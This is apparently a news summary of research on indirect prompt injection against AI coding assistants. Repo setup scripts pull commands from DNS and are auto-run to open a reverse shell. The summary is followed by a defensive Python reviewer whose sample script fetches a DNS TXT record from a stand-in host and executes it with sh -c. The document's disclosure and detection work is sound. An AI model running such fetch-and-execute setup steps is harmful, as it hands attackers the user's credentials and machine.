
Security researchers discovered a new attack vector where AI coding assistants like Claude Code can be tricked into running hidden malware from seemingly legitimate GitHub repositories. The attack exploits indirect prompt injection—malicious code is pulled from a DNS entry at runtime and executes automatically when the AI encounters a setup error, giving attackers reverse shell access to steal credentials and maintain persistence. The vulnerability underscores a significant risk for developers who use AI coding tools on untrusted third-party code.
What happened
Security researchers at 0DIN found that attackers can compromise developers' machines through GitHub repositories using indirect prompt injection. A setup script in a repo pulls commands from a DNS entry at runtime and executes them invisibly—Claude Code hits a routine error, automatically runs the script, and opens a reverse shell giving attackers full control.
Why it matters
The malicious code never exists in the repository itself, making it invisible to scanners, code reviews, and the AI agent. Once an attacker gains access, they can steal API keys and login credentials and maintain persistent access. A single repo link shared in a job posting, tutorial, or Slack message is enough to compromise anyone who opens it with an AI coding tool.
What to watch
The researchers recommend that AI agents display the contents of a setup script before running it, and that developers treat setup instructions in third-party repos as untrusted code.
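
One way to act on that recommendation, as an added example (not code from 0DIN or from any AI coding tool): a Python pre-run review that lists a setup script with line numbers and flags lines where DNS lookup output reaches a shell interpreter. The tool and sink lists, the function names, and the sample script are assumptions made for this illustration.

```python
import re

# Illustrative heuristics chosen for this example; extend both lists for real use.
DNS_LOOKUP = re.compile(r"(?<![\w.-])(dig|nslookup|host|drill|kdig)\s")
EXEC_SINK = re.compile(r"\beval\b|\|\s*(ba|z|da)?sh\b|\b(ba|z|da)?sh\s+-c\b|\bsource\s")
ASSIGN = re.compile(r"^\s*(?:export\s+)?([A-Za-z_]\w*)=")

def review_setup_script(text):
    """Return (line_no, reason) for each line where DNS output reaches an interpreter."""
    findings, tainted = [], set()   # tainted: variables holding DNS-derived data
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        has_dns = bool(DNS_LOOKUP.search(line))
        has_sink = bool(EXEC_SINK.search(line))
        uses_taint = any(re.search(r"\$\{?" + re.escape(v) + r"\b", line) for v in tainted)
        if has_dns and has_sink:
            findings.append((no, "DNS lookup output executed directly"))
        elif has_sink and uses_taint:
            findings.append((no, "DNS-derived variable executed"))
        m = ASSIGN.match(line)
        if m and (has_dns or uses_taint):
            tainted.add(m.group(1))        # taint propagates through assignment
        elif m:
            tainted.discard(m.group(1))    # overwritten with a non-DNS value
    return findings

def render_review(text):
    """Numbered listing to show a human before anything runs; flagged lines are marked."""
    flagged = dict(review_setup_script(text))
    rows = []
    for no, raw in enumerate(text.splitlines(), 1):
        note = f"   <-- {flagged[no]}" if no in flagged else ""
        rows.append(f"{'!!' if no in flagged else '  '} {no:3d} | {raw}{note}")
    return "\n".join(rows)

# Constructed sample script (not taken from any real repository).
SAMPLE = """#!/bin/sh
pip install -r requirements.txt
cfg=$(dig +short TXT setup.example.invalid)
step="$cfg"
sh -c "$step"
"""

if __name__ == "__main__":
    print(render_review(SAMPLE))
```

A clean result from a pattern check like this does not make a third-party script trusted; the listing is there so a person reads the script before it runs.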